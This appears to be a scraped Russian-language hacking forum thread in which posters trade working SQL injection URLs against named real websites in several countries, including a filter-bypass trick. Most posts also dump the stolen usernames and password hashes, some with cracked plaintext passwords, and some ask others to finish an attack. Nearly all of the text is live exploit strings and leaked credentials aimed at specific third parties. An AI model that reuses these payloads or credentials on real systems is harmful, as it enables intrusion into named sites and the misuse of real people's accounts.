HTML: http://www.nerdtests.com/pics.php?id=-64+union+select+1,2,3,concat_ws(char(5 8),user,password),5,6,7+from+mysql.user+limit+6,1--
Code: http://www.ahfx.net/weblog.php?article=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(table_name,0x71),0x71),3,4,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables+limit+18,1/*
Code: http://www.ontario-tut.ru/prihoj_big.php?id=-8+union+select+1,2,user(),concat(database(),char(58),version()),5,6,7,8,9,10,11,12,13/* Code: http://ww.trizway.com/show.php?id=-41+union+select+1,email,3,4,5,6,7,8,9,10,11,12,13,14,15+from+subscriber/*&pg=2 author news
sql-inj Сайт: http://www.botans.ru уязвимость: http://www.botans.ru/study.php?groupid=2' подобранные таблицы: users подобранные поля: username,pass,email,id 193 организмa
sql-continued нашел users : login,password,email,id marina:ce5225d01c39d2567bc229501d9e610d (pass:marina) но практической пользы никакой - есть админка (http://fitnessmanager.ru/admin), но там другие данные.
Code: http://zvisti.com.ua/info.php?id=-421%20UNION%20SELECT%201,2,3,4,5,table_name,7,8,9,10,11,12+from+INFORMATION_SCHEMA.TABLES+limit+15,1/* Code: http://sodruzestvo.com/news/news.php?nid=-3+union+select+1,user(),3/* =\
бильярдец) propool.ru Code: http://www.propool.ru/news.php?id=-1+union+select+1,2,3,4,concat(username,0x3a,user_password),6,7,8,9,10,11+from+bb_users+limit+1,1/* Vladimir:9497a5313079f955e60747fed4639ae6:piraxy админка защищена .htaccess'ом... =\
Вот решил Эстонию пощупать : www.leisivald.ee Code: http://www.leisivald.ee/index.php?b=-45+union+select+concat(login,char(58),password),2+from+users/* aina:462b87e9b978289beae59ff7ed7f4799 kaius:c2ea7f63c808abc0cf77b59226f3775b
Help sql-inj: www.autoteatr.ru Code: http://www.autoteatr.ru/catalog.php?subid=114 http://www.autoteatr.ru/catalog.php?subid=115-1 http://www.autoteatr.ru/catalog.php?subid=114' Дошёл до 40 колонок (скока же их там?) - не получается составить правильный запрос к БД.
http://www.autoteatr.ru/catalog.php?subid=-1+union+select+concat(convert(username+using+cp1251),0x3a,convert(user_password+using+cp1251))+from+phpbb_users+limit+1,2/* Mixa:runner
Code: http://www.alexavto.ru/catalog.php?id=-123+union+select+1,version(),3,4,5,user(),7,8,9,10,11,12,13/*
Обход фильтрации через AES_DECRYPT(AES_ENCRYPT()) Code: _http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+version()/* - так облом, а вот так: _http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71)/* - нет облома ;)
какая еще фильтрация? просто кодировки не сочетаются. нужно просто convert(version()+using+latin1)/* Code: http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+convert(version()+using+latin1)/* //с кем не бывает..
Уральский Государственный Экономический университет http://www.usue.ru/general/professors/?id=-1+union+select+1,2,user_icq,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(username,char(58),user_password)+from+www.phpbb_users+limit+1,1/* slava:a6ad04d2d6f6d7cf072f27e46be45326 Всего зарегистрированных пользователей: 1368
http://news.ntv.ru/news/NewsPrint.jsp?nid=102499+order+by+56-- если кто дальше продолбит скиньте сюда или в личку плиз )
sql-inj КВН - 1я украинская лига Сайт: http://kvn.odessa.ua уязвимость: http://kvn.odessa.ua/gallery.php?action=view&cat=11' подобранные таблицы: userlist подобранные поля: name,pass 2 организмa (админы сайта) endorfine:6bdd7328ba8d625d540a4203311f5ec5 dimon:77963b7a931377ad4ab5ad6a9cd718aa:ddd админка :
дальше сам уже Code: http://www.logo.artperm.ru/script.php?litera=4'+union+select+1,2,version(),4,5,6,7,8/*
sql-inj Информационное агенство Сайт: http://www.7info.ru уязвимость: http://www.7info.ru/index.php?ns=127&id=61' подобранные таблицы: user подобранные поля: login,password,name 12 организмов Admin:b842f0802c987156629ea4c87cca1259 Админку не обнаружил.
